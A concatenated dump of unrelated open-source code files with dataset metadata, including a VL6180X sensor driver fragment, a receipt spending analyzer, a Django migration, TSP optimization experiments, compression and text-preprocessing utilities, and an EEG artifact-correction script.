self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_RESULT_INTERRUPT_STATUS_GPIO>>8, [self.VL6180X_RESULT_INTERRUPT_STATUS_GPIO])
result = self.__i2cbus.read_byte(self.__i2c_addr)
result = (result>>3) & 0x07
return result
'''
@brief turn off interleaved mode
'''
def __stop_interleave_mode(self):
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSALS_START>>8, [self.VL6180X_SYSALS_START,0x01])
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_INTERLEAVED_MODE_ENABLE>>8, [self.VL6180X_INTERLEAVED_MODE_ENABLE,0x00])
'''
@brief Gets validation information for range data
@return Authentication information
'''
def get_range_result(self):
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_RESULT_RANGE_STATUS>>8, [self.VL6180X_RESULT_RANGE_STATUS])
result = self.__i2cbus.read_byte(self.__i2c_addr)>>4
return result
'''
@brief set IIC addr
@param addr The IIC address to be modified
'''
def set_iic_addr(self,addr):
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_I2C_SLAVE_DEVICE_ADDRESS>>8, [self.VL6180X_I2C_SLAVE_DEVICE_ADDRESS,addr])
self.__i2c_addr = addr
'''
@brief Initialize the sensor configuration
'''
def __init(self):
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSTEM_FRESH_OUT_OF_RESET>>8, [self.VL6180X_SYSTEM_FRESH_OUT_OF_RESET])
reset = self.__i2cbus.read_byte(self.__i2c_addr)
if(reset):
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,0x02, [0x07,0x01])
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,0x02, [0x08,0x01])
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,0x00, [0x96,0x00])
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,0x00, [0x97,0xfd])
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,0x00, [0xe3,0x00])
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,0x00, [0xe4,0x04])
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,0x00, [0xe5,0x02])
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,0x00, [0xe6,0x01])
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,0x00, [0xe7,0x03])
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,0x00, [0xf5,0x02])
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,0x00, [0xd9,0x05])
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,0x00, [0xdb,0xce])
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,0x00, [0xdc,0x03])
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,0x00, [0xdd,0xf8])
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,0x00, [0x9f,0x00])
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,0x00, [0xa3,0x3c])
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,0x00, [0xb7,0x00])
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,0x00, [0xbb,0x3c])
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,0x00, [0xb2,0x09])
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,0x00, [0xca,0x09])
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,0x01, [0x98,0x01])
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,0x01, [0xb0,0x17])
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,0x01, [0xad,0x00])
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,0x00, [0xff,0x05])
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,0x01, [0x00,0x05])
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,0x01, [0x99,0x05])
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,0x01, [0xa6,0x1b])
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,0x01, [0xac,0x3e])
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,0x01, [0xa7,0x1f])
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,0x00, [0x30,0x00])
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSRANGE_INTERMEASUREMENT_PERIOD>>8, [self.VL6180X_SYSRANGE_INTERMEASUREMENT_PERIOD,0x09])
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSRANGE_VHV_REPEAT_RATE>>8, [self.VL6180X_SYSRANGE_VHV_REPEAT_RATE,0xFF])
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSRANGE_VHV_RECALIBRATE>>8, [self.VL6180X_SYSRANGE_VHV_RECALIBRATE,0x01])
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSRANGE_MAX_CONVERGENCE_TIME>>8, [self.VL6180X_SYSRANGE_MAX_CONVERGENCE_TIME,0x31])
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSALS_INTERMEASUREMENT_PERIOD>>8, [self.VL6180X_SYSALS_INTERMEASUREMENT_PERIOD,0x31])
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSALS_INTEGRATION_PERIOD>>8, [self.VL6180X_SYSALS_INTEGRATION_PERIOD,0x63])
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_READOUT_AVERAGING_SAMPLE_PERIOD>>8, [self.VL6180X_READOUT_AVERAGING_SAMPLE_PERIOD,0x30])
self.set_als_gain(self.VL6180X_ALS_GAIN_1)
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSTEM_MODE_GPIO1>>8, [self.VL6180X_SYSTEM_MODE_GPIO1,0x20])
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSTEM_INTERRUPT_CONFIG_GPIO>>8, [self.VL6180X_SYSTEM_INTERRUPT_CONFIG_GPIO,0x00])
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSRANGE_START>>8, [self.VL6180X_SYSRANGE_START,0x00])
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSALS_START>>8, [self.VL6180X_SYSALS_START,0x00])
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_INTERLEAVED_MODE_ENABLE>>8, [self.VL6180X_INTERLEAVED_MODE_ENABLE,0x00])
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSTEM_FRESH_OUT_OF_RESET>>8, [self.VL6180X_SYSTEM_FRESH_OUT_OF_RESET,0])
'''
@brief Set Range Threshold Value
@param thresholdL :Lower Threshold
@param thresholdH :Upper threshold
'''
def set_range_threshold_value(self,threshold_l,threshold_h):
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSRANGE_THRESH_LOW>>8, [self.VL6180X_SYSRANGE_THRESH_LOW,threshold_l])
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSRANGE_THRESH_HIGH>>8, [self.VL6180X_SYSRANGE_THRESH_HIGH,threshold_h])
'''
@brief Set ALS Threshold Value
@param thresholdL :Lower Threshold
@param thresholdH :Upper threshold
'''
def set_als_threshold_value(self,threshold_l,threshold_h):
value_l = int((threshold_l * self.__gain)/0.32)
value_h = int((threshold_h* self.__gain)/0.32)
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSALS_THRESH_LOW>>8, [self.VL6180X_SYSALS_THRESH_LOW,threshold_l>>8,value_l])
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSALS_THRESH_HIGH>>8, [self.VL6180X_SYSALS_THRESH_HIGH,threshold_h>>8,value_h])
'''
@brief Set the ALS gain
@param gain the value of gain(range 0-7)
@n 20 times gain: VL6180X_ALS_GAIN_20 = 0
@n 10 times gain: VL6180X_ALS_GAIN_10 = 1
@n 5 times gain: VL6180X_ALS_GAIN_5 = 2
@n 2.5 times gain: VL6180X_ALS_GAIN_2_5 = 3
@n 1.57 times gain: VL6180X_ALS_GAIN_1_67 = 4
@n 1.27 times gain: VL6180X_ALS_GAIN_1_25 = 5
@n 1 times gain: VL6180X_ALS_GAIN_1 = 6
@n 40 times gain: VL6180X_ALS_GAIN_40 = 7
@return true :Set up the success, false :Setup failed
'''
def set_als_gain(self,gain):
if(gain>7):
return False
if(gain == self.VL6180X_ALS_GAIN_20):
self.__gain = 20
elif(gain == self.VL6180X_ALS_GAIN_10):
self.__gain = 10
elif(gain == self.VL6180X_ALS_GAIN_5):
self.__gain = 5.0
elif(gain == self.VL6180X_ALS_GAIN_2_5):
self.__gain = 2.5
elif(gain == self.VL6180X_ALS_GAIN_1_67):
self.__gain = 1.67
elif(gain == self.VL6180X_ALS_GAIN_1_25):
self.__gain = 1.25
elif(gain == self.VL6180X_ALS_GAIN_1):
self.__gain = 1.0
elif(gain == self.VL6180X_ALS_GAIN_40):
self.__gain = 40
gain =gain | 0x40
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSALS_ANALOGUE_GAIN>>8, [self.VL6180X_SYSALS_ANALOGUE_GAIN,gain])
return True
'''
@brief get the identifier of sensor
@return Authentication information
'''
def __get_device_id(self):
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_IDENTIFICATION_MODEL_ID>>8, [self.VL6180X_IDENTIFICATION_MODEL_ID])
id = self.__i2cbus.read_byte(self.__i2c_addr)
return id
| 1.984375 | 2 |
remaquery.py | wulffern/remaquery | 0 | 12799110 | ######################################################################
## Copyright (c) 2019 <NAME>, Norway
## ###################################################################
## Created : wulff at 2019-3-25
## ###################################################################
## The MIT License (MIT)
##
## Permission is hereby granted, free of charge, to any person obtaining a copy
## of this software and associated documentation files (the "Software"), to deal
## in the Software without restriction, including without limitation the rights
## to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
## copies of the Software, and to permit persons to whom the Software is
## furnished to do so, subject to the following conditions:
##
## The above copyright notice and this permission notice shall be included in all
## copies or substantial portions of the Software.
##
## THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
## IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
## FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
## AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
## LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
## OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
## SOFTWARE.
##
######################################################################
import os
import json
import sys
import collections
import datetime
import click
from collections import OrderedDict
import matplotlib.pyplot as plt
import pandas as pd
class rema:
def __init__(self,file):
with open(file,"r") as f:
jsonobj = json.load(f)
cat_fn = "categories.json"
categories = None
if(os.path.exists(cat_fn)):
with open(cat_fn,"r") as f:
categories = json.load(f)
self.categories = categories
self.obj = jsonobj
self.oformat = "str"
def printGroups(self):
groups = dict()
transactions = self.obj["TransactionsInfo"]["Transactions"]
for t in transactions:
for item in t["Receipt"]:
groups[item["ProductGroupDescription"]] = " "
self.printList(groups)
def printOrderByGroupOrCategory(self,maxcount=10,month = False,category=False,keyName=None,plot=False,quarter=False):
summary = dict()
if self.categories is None and category:
print("Could not find categories.json. Can't run this command")
transactions = self.obj["TransactionsInfo"]["Transactions"]
for t in transactions:
datestr= str(t["PurchaseDate"])
d = datetime.datetime.utcfromtimestamp(int(datestr[:-3]))
if(month):
header_key = str(d.year) + "-" + str(d.month)
elif(quarter):
header_key = str(d.year) + "-Q" + str(pd.Timestamp(d).quarter)
else:
header_key = str(d.year)
if(header_key not in summary):
summary[header_key] = dict()
for item in t["Receipt"]:
key = item["ProductGroupDescription"]
if(category and key in self.categories ):
key = self.categories[key]
# print(json.dumps(item,indent=4))
if(keyName and key == keyName):
key = item['ProductDescription']
elif(keyName):
continue
if(key in summary[header_key]):
summary[header_key][key] += item["Amount"]
else:
summary[header_key][key] = item["Amount"]
self.printTransactionSummary(summary,maxcount,plot)
def printTransactionSummary(self,summary,maxcount,plot):
data = OrderedDict()
for header_key in summary:
transactions = summary[header_key]
data[header_key] = list()
listofTuples = sorted(transactions.items() ,reverse = True, key=lambda x: x[1])
count = 0
for s in listofTuples:
if(count >= maxcount):
continue
else:
count += 1
data[header_key].append((s[1],s[0]))
if(plot):
self.plotDictWithTouple(data)
pass
else:
self.printDictWithTouple(data)
def printList(self,data):
"""Print a list of items"""
if(self.oformat == "json"):
print(json.dumps(data,indent=4))
else:
for el in data:
print(el)
def plotDictWithTouple(self,data):
"""Print ordered dictionary where each item is a (number,description) touple"""
pdata = dict()
#- Reorganize data
for key in data:
for el in data[key]:
val = el[0]
name = el[1]
if name not in pdata:
pdata[name] = dict()
pdata[name]['yval'] = list()
pdata[name]['xval'] = list()
pdata[name]['yval'].append(val)
pdata[name]['xval'].append(key)
#with plt.xkcd():
for key in pdata:
plt.plot(pdata[key]['xval'],pdata[key]['yval'],label=key)
plt.xlabel('Date [n]')
plt.ylabel("Kostnad [kr]")
plt.legend()
plt.xticks(rotation=90)
plt.savefig("plot.jpg")
#plt.xlim([datetime.date(2016, 1, 1), datetime.datetime.now()])
#plt.autoscale()
plt.show()
def printDictWithTouple(self,data):
"""Print ordered dictionary where each item is a (number,description) touple"""
if(self.oformat == "json"):
print(json.dumps(data,indent=4))
else:
for key in data:
print(str(key) + ":")
for el in data[key]:
print("\t%.1f\t%s" %(el[0],el[1]))
#----------------------------------------------------------
#- Command line interface
#----------------------------------------------------------
@click.group()
@click.argument('data', type=click.Path(exists=True))
@click.option('--json',is_flag=True,help="Set JSON as output format")
@click.pass_context
def cli(ctx,data,json):
ctx.ensure_object(dict)
#Load the file
r = rema(data)
if(json):
r.oformat = "json"
else:
r.oformat = "str"
ctx.obj['rema'] = r
@cli.command('list',help="Sum and list items")
@click.pass_context
@click.option('--maxcount',default=10,help="Number of items to list")
@click.option('--month',is_flag=True,help="Sort per month")
@click.option("--category",is_flag=True,help="Sort by categories.json file")
@click.option("--item",help="Specify a certain group or category")
@click.option("--plot",is_flag=True,help="Plot items")
@click.option('--quarter',is_flag=True,help="Sort per quarter")
def group(ctx,maxcount,month,category,item,plot,quarter):
ctx.obj['rema'].printOrderByGroupOrCategory(maxcount,month,category,item,plot,quarter)
@cli.command('listgroups',help="List all groups")
@click.pass_context
def listgroups(ctx):
ctx.obj['rema'].printGroups()
if __name__ == "__main__":
cli(obj = {}) | 1.164063 | 1 |
deployment/engine.py | cu-csc/automaton | 1 | 12799111 | """
implements the staged deployment engine which contains the logic and
order of execution
"""
class StagedDeploymentEngine(object):
def __init__(self):
raise NotImplementedError
| 1.625 | 2 |
NFCow/malls/apps.py | jojoriveraa/titulacion-NFCOW | 0 | 12799112 | from django.apps import AppConfig
class MallsConfig(AppConfig):
name = 'malls'
| 1.257813 | 1 |
prueba.py | IC-3002/ic-3002-2020ii-p2-lobo | 0 | 12799113 | <filename>prueba.py
import re
from simulated_annealing import optimizar
from dominio_tsp import DominioTSP
#from dominio_ag_tsp import DominioAGTSP
#from algoritmo_genetico import optimizar
from math import e
from time import time
"""
temperatura = 10000
enfriamiento = [0.8,0.9,0.95,0.99]
dominio = DominioTSP('datos/ciudades_cr.csv', 'Alajuela')
while(temperatura < 10000000):
for tasa in enfriamiento:
solucion,cont = optimizar(dominio,temperatura,tasa)
print("| 17 |", temperatura, "|", tasa, "|", round(solucion,3), "|", cont, "|")
temperatura = temperatura/0.2
"""
"""
poblacion = 100
elite = 0.1
mutacion = [0.1,0.3,0.5,0.7,0.9]
reps = 1000
test = False
dominio = DominioAGTSP('datos/ciudades_cr.csv', 'Alajuela')
# (dominio, 100, 0.1, 0.5, 1000, False)
#optimizar(dominio, tam_pobl, porc_elite, prob_mut, reps, testeo):
while(poblacion <= 1000):
for p in mutacion:
solucion = optimizar(dominio,poblacion,elite,p,reps,test)
#print("poblacion: ", poblacion, ", mutacion: ", p)
#print("Solucion: ", dominio.fcosto(solucion), "\n")
print("| 16 |", poblacion, "|", p, "|", round(dominio.fcosto(solucion),3), "| 1000 |")
poblacion = poblacion + 200
"""
#Annealing: 1250000.0 0.99 1762.4 1856
#Genetico: 700 0.1 1675.0 1000
#Simualted Annealing
dominio = DominioTSP('datos/ciudades_cr.csv', 'Alajuela')
for i in range(0,5):
# start_time = time()
solucion = optimizar(dominio,1250000.0,0.99)
# elapsed_time = time() - start_time
#print("Elapsed time: %0.10f seconds." % elapsed_time)
print (solucion)
#Genetico
"""
dominio = DominioAGTSP('datos/ciudades_cr.csv', 'Alajuela')
for i in range(0,5):
start_time = time()
solucion = optimizar(dominio,700,0.1,0.1,1000,False)
elapsed_time = time() - start_time
print("Elapsed time: %0.10f seconds." % elapsed_time)
print (dominio.fcosto(solucion))
"""
| 2.765625 | 3 |
indumpco/file_format.py | ncleaton/indumpco | 0 | 12799114 | <filename>indumpco/file_format.py<gh_stars>0
# -*- coding: utf-8 -*-
import zlib
import lzma
import re
import os
class FormatError(Exception):
pass
def pack_idxline(seg_len, seg_sum):
return "%d %s\n" % (int(seg_len), seg_sum)
def unpack_idxline(idxline):
hit = re.match(r'^([0-9]+) (\w+)\s*$', idxline)
if not hit:
raise FormatError("malformed index line", idxline)
seg_len = int(hit.group(1))
seg_sum = hit.group(2)
return seg_len, seg_sum
class BlockFileRead(object):
def __init__(self, seg_sum, filename):
self.main_seg_sum = seg_sum
self.filename = filename
self.fh = open(filename)
self.format_byte = self.fh.read(1)
self.extra_idxlines = set()
if self.format_byte == 'z':
self.is_x_group = False
elif self.format_byte == 'x':
self.is_x_group = True
self.x_overall_sum = self.fh.readline().strip()
embedded_idxline_count = int(self.fh.readline().strip())
self.x_embedded_idxlines = []
self.x_overall_len = 0
for _ in range(embedded_idxline_count):
idxline = self.fh.readline()
self.x_embedded_idxlines.append(idxline)
xseglen, xsegsum = unpack_idxline(idxline)
self.x_overall_len += xseglen
if xsegsum != self.main_seg_sum:
self.extra_idxlines.add(idxline)
self.x_overall_idxline = pack_idxline(self.x_overall_len, self.x_overall_sum)
if self.main_seg_sum != self.x_overall_sum:
self.extra_idxlines.add(self.x_overall_idxline)
else:
raise FormatError("invalid first byte of compressed block", (self.blk_file, format_byte))
def x_unpack_segs(self, desired_idxline_set):
xz_data = self.fh.read()
unpacked_data = lzma.decompress(xz_data)
if self.x_overall_idxline in desired_idxline_set:
yield (self.x_overall_idxline, unpacked_data)
offset = 0
for idxline in self.x_embedded_idxlines:
xseglen, xsegsum = unpack_idxline(idxline)
if idxline in desired_idxline_set:
yield (idxline, unpacked_data[offset:offset+xseglen])
offset += xseglen
if offset != len(unpacked_data):
raise FormatError("lzma data len not consistent with seg lens in x header", self.filename)
def z_unpack_seg(self):
return zlib.decompress(self.fh.read())
class BlockDirBase(object):
def __init__(self, dirname):
self.dirname = dirname
class FlatBlockDir(BlockDirBase):
def filename(self, seg_sum):
return os.path.join(self.dirname, seg_sum)
class Nest1BlockDir(BlockDirBase):
def filename(self, seg_sum):
return os.path.join(self.dirname, os.path.join(seg_sum[0], seg_sum))
def BlockDir(dirname):
if os.path.exists(os.path.join(dirname, "0")):
return Nest1BlockDir(dirname)
else:
return FlatBlockDir(dirname)
class BlockSearchPath(object):
def __init__(self, dirnames):
self.block_dirs = [BlockDir(d) for d in dirnames]
def find_block(self, seg_sum):
for bd in self.block_dirs:
f = bd.filename(seg_sum)
if os.path.exists(f):
return f
return None
def compress_string_to_zfile(src_str, dest_file):
f = open(dest_file, 'w')
f.write('z')
f.write(zlib.compress(src_str, 9))
f.close()
def decompress_zfile_to_string(src_file):
f = open(src_file)
formatbyte = f.read(1)
if formatbyte != 'z':
raise FormatError("blockfile is not a zlib file", (src_file, formatbyte))
return zlib.decompress(f.read())
| 2.578125 | 3 |
venv/lib/python3.6/site-packages/pylint/test/functional/too_many_lines.py | aitoehigie/britecore_flask | 0 | 12799115 | # pylint: disable=missing-docstring
# -1: [too-many-lines]
__revision__ = 0
ZERFZAER = 3
HEHEHE = 2
| 1.054688 | 1 |
UserProfiles/migrations/0006_auto_20180812_2236.py | Milo-Goodfellow-Work/GuildsDevelopmentBuild | 0 | 12799116 | # Generated by Django 2.0.7 on 2018-08-12 22:36
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('UserProfiles', '0005_auto_20180808_2150'),
]
operations = [
migrations.AlterField(
model_name='userprofilemodel',
name='UserProfileBio',
field=models.TextField(blank=True, max_length=300, null=True),
),
migrations.AlterField(
model_name='userprofilemodel',
name='UserProfileHeader',
field=models.ImageField(default='UserProfiles/Defaults/BlankWhite.png', upload_to='UserProfiles/'),
),
migrations.AlterField(
model_name='userprofilemodel',
name='UserProfileImage',
field=models.ImageField(default='UserProfiles/Defaults/Blank.png', upload_to='UserProfiles/'),
),
]
| 1.617188 | 2 |
rle.py | ashkitten/dosdvd | 5 | 12799117 | <gh_stars>1-10
def rle():
with open("logo.ascii") as fp:
logo = fp.read().split("\n")[:-1]
# simple row based rle
bits = 5
cur = "."
run = 0
buf = list()
for row in logo:
for c in row:
if c == cur:
run += 1
else:
cur = c
buf += [run]
run = 1
if run > 2 ** bits - 1:
buf += [2 ** bits - 1]
buf += [0]
run = run - 2 ** bits + 1
# we don't need to append the last run if it's a run of 0's
if cur != ".":
buf += [run]
# iterator to split off the data into chunks
def chunks(l, n):
ret = list()
for b in l:
ret += [b]
if len(ret) == n:
yield ret
ret = list()
if len(ret) == 0: return
while len(ret) % n != 0:
ret += [0]
yield ret
buf2 = list()
for b in chunks(buf, 3):
i = b[0] | b[1] << 5 | b[2] << 10 | 1 << 15
buf2 += [i & 0xff, i >> 8 & 0xff]
return (len(logo[0]), len(logo), buf2)
if __name__ == "__main__":
(width, height, buf) = rle()
# print it as a nasm data directive
print("logo_width equ", width)
print("logo_height equ", height)
print("db " + ", ".join(map(str, buf)))
| 3.140625 | 3 |
microbenchmarks/oldstyle_iteration.py | aisk/pyston | 1 | 12799118 | class C:
def __init__(self):
self.l = range(10)
def __getitem__(self, idx):
return self.l[idx]
def f():
c = C()
total = 0
for _ in xrange(100000):
for i in c:
total += i
print total
f()
| 3.109375 | 3 |
textpreprocess.py | skbly7/usefulness | 0 | 12799119 | #!/usr/bin/python
import html2text
#import tokenizer
from nltk.tokenize import MWETokenizer as tokenizer
import nltk
#from nltk import word_tokenize
from nltk.tokenize import WordPunctTokenizer # This is better for sentences containing unicode, like: u"N\u00faria Espert"
word_tokenize = WordPunctTokenizer().tokenize
#from nltk.corpus import stopwords
# Use the PyStemmer stemmer, since it is written in C and is thus much faster than the NLTK porter stemmer
import Stemmer
#from nltk.stem.porter import PorterStemmer
import os.path
import re
import string
STOPFILE = os.path.join(os.path.abspath(os.path.dirname(os.path.realpath(__file__))), "english.stop")
stoplist = None
_wsre = re.compile("\s+")
_alphanumre = re.compile("[\w\-\' ]", re.UNICODE)
#stemmer = PorterStemmer()
stemmer = Stemmer.Stemmer("english")
def textpreprocess(txt, converthtml=True, sentencetokenize=True, removeblanklines=True, replacehyphenbyspace=True, wordtokenize=True, lowercase=True, removestopwords=True, stem=True, removenonalphanumericchars=True, stemlastword=False, stripallwhitespace=False):
"""
Note: For html2text, one could also use NCleaner (common.html2text.batch_nclean)
Note: One could improve the sentence tokenization, by using the
original HTML formatting in the tokenization.
Note: We use the Porter stemmer. (Optimization: Shouldn't rebuild
the PorterStemmer object each time this function is called.)
"""
if converthtml:
txt = html2text.html2text(txt)
if sentencetokenize:
txts = nltk.word_tokenize(txt)
#txts = tokenizer.tokenize(txt.split())
else:
txts = [txt]
txt = None
if removeblanklines:
newtxts = []
for t in txts:
if len(string.strip(t)) > 0:
newtxts.append(t)
txts = newtxts
if replacehyphenbyspace:
txts = [t.replace("-", " ") for t in txts]
if wordtokenize:
txtwords = [word_tokenize(t) for t in txts]
else:
txtwords = [string.split(t) for t in txts]
txts = None
if lowercase:
txtwords = [[string.lower(w) for w in t] for t in txtwords]
if removestopwords:
txtwords = _removestopwords(txtwords)
if stem:
txtwords = _stem(txtwords)
# TODO: Maybe remove Unicode accents? http://stackoverflow.com/questions/517923/what-is-the-best-way-to-remove-accents-in-a-python-unicode-string
if removenonalphanumericchars:
txtwords = _removenonalphanumericchars(txtwords)
txtwords = [[w for w in t if w != ""] for t in txtwords]
if stemlastword:
txtwords = _stemlastword(txtwords)
txts = [string.join(words) for words in txtwords]
if stripallwhitespace:
txts = _stripallwhitespace(txts)
return string.join(txts, sep=" ")
def _removestopwords(txtwords):
global stoplist
# stoplist = stopwords.words("english")
if stoplist is None:
stoplist = frozenset([string.strip(l) for l in open(STOPFILE).readlines()])
return [[w for w in t if w not in stoplist] for t in txtwords]
def _stem(txtwords):
# stemmer = PorterStemmer()
# return [[stemmer.stem(w) for w in t] for t in txtwords]
return [stemmer.stemWords(t) for t in txtwords]
def _removenonalphanumericchars(txtwords):
return [[string.join([c for c in w if _alphanumre.search(c) is not None], "") for w in t] for t in txtwords]
def _stemlastword(txtwords):
# return [t[:-1] + [stemmer.stem(t[-1])] for t in txtwords if len(t) > 0]
return [t[:-1] + [stemmer.stemWord(t[-1])] for t in txtwords if len(t) > 0]
def _stripallwhitespace(txts):
return [_wsre.sub("", txt) for txt in txts]
if __name__ == "__main__":
import sys
print textpreprocess('hello how are you sleeping ?')
print textpreprocess(sys.stdin.read())
| 3.1875 | 3 |
model/project.py | checheninao/python_training_mantis | 0 | 12799120 | class Project:
def __init__(self, name, status=None, description=None):
self.name = name
self.description = description
self.status = status
def __repr__(self):
return self.name
def __eq__(self, other):
return self.name == other.name
def key(self):
return self.name
| 2.875 | 3 |
util/process_dump.py | ArchiveTeam/twitchtv-index | 0 | 12799121 | <filename>util/process_dump.py
import argparse
import collections
import json
import shutil
import os
def main():
arg_parser = argparse.ArgumentParser()
arg_parser.add_argument('input_dump', type=argparse.FileType('r'))
arg_parser.add_argument('output_dir')
args = arg_parser.parse_args()
if not os.path.isdir(args.output_dir):
raise Exception('output_dir is not a directory')
user_pool = collections.defaultdict(
lambda: collections.defaultdict(
lambda: collections.defaultdict(list))
)
flv_pool = collections.defaultdict(lambda: collections.defaultdict(dict))
for line in args.input_dump:
doc = json.loads(line)
if not doc.get('item_added_to_tracker'):
continue
user = doc['user'].lower()
video_id = doc['video_id']
user_pool[user[0:1]][user[0:2]][user].append(video_id)
user_pool[user[0:1]][user[0:2]][user] = list(sorted(user_pool[user[0:1]][user[0:2]][user]))
flv_urls = []
flv_doc = doc['flv']
flv_keys = tuple(sorted(int(key) for key in flv_doc.keys()))
for key in flv_keys:
url = flv_doc[str(key)]
flv_urls.append(url)
flv_pool[video_id[0:2]][video_id[0:3]][video_id] = flv_urls
for key, subpool in user_pool.items():
for subkey, subsubpool in subpool.items():
path = 'channel/{0}/data-{1}.json'.format(key, subkey)
path = os.path.join(args.output_dir, path)
dir_path = os.path.dirname(path)
if not os.path.exists(dir_path):
os.makedirs(dir_path)
with open(path, 'w') as out_file:
json.dump(subsubpool, out_file, indent=2)
for key, subpool in flv_pool.items():
for subkey, subsubpool in subpool.items():
path = 'video/{0}/data-{1}.json'.format(key, subkey)
path = os.path.join(args.output_dir, path)
dir_path = os.path.dirname(path)
if not os.path.exists(dir_path):
os.makedirs(dir_path)
with open(path, 'w') as out_file:
json.dump(subsubpool, out_file, indent=2)
if __name__ == '__main__':
main()
| 2.359375 | 2 |
utils_prep/preproc_manu/ASR/1_AsrCorrection.py | GanshengT/INSERM_EEG_Enrico_Proc | 1 | 12799122 | # -*- coding: utf-8 -*-
"""
Created on Fri Jun 21 15:39:43 2019
@author: Manu
"""
import mne
from mne import io
import sys
sys.path.append('C:/_MANU/_U821/Python_Dev/')
import scipy
from util import tools,asr,raw_asrcalibration
import numpy as np
import matplotlib.pyplot as plt
from mne.viz import plot_evoked_topo
fname = 'C:/_MANU/_U821/_wip/ContextOdd/raw/ANDNI_0001.vhdr'
raw = io.read_raw_brainvision(fname, preload = False)
picks_eeg = mne.pick_types(raw.info, meg=False, eeg=True, eog=False,stim=False, exclude='bads')
ListChannels = np.array(raw.info['ch_names'])
montage = mne.channels.read_montage(kind='standard_1020',ch_names=ListChannels[picks_eeg])
raw = io.read_raw_brainvision(fname, montage=montage, preload = True)
picks_eeg = mne.pick_types(raw.info, meg=False, eeg=True, eog=False,stim=False, exclude='bads')
raw =raw.pick_types( meg=False, eeg=True, eog=False,stim=True, exclude='bads')
# ASR Calibration
raworig_Data= raw._data
l_freq = 2
h_freq = 20
Wn = [l_freq/(raw.info['sfreq']/2.), h_freq/(raw.info['sfreq']/2.) ]
b, a = scipy.signal.iirfilter(N=2, Wn=Wn, btype = 'bandpass', analog = False, ftype = 'butter', output = 'ba')
raw._data[picks_eeg,:]=scipy.signal.lfilter(b, a, raworig_Data[picks_eeg,:], axis = 1, zi = None)
rawCalibAsr=raw.copy()
tmin = 30
tmax = 60 #s
rawCalibAsr = rawCalibAsr.crop(tmin=tmin,tmax=tmax)
ChanName4VEOG = ['Fp1','Fp2'] # 2 VEOG
cutoff = 5 # Makoto preprocessing says best between 10 and 20 https://sccn.ucsd.edu/wiki/Makoto%27s_preprocessing_pipeline#Alternatively.2C_cleaning_continuous_data_using_ASR_.2803.2F26.2F2019_updated.29
Yule_Walker_filtering = True
state = raw_asrcalibration.raw_asrcalibration(rawCalibAsr,ChanName4VEOG, cutoff,Yule_Walker_filtering)
# ASR process on epoch
event_id = {'Std': 1, 'Dev': 2}
events_orig,_ = mne.events_from_annotations(raw)
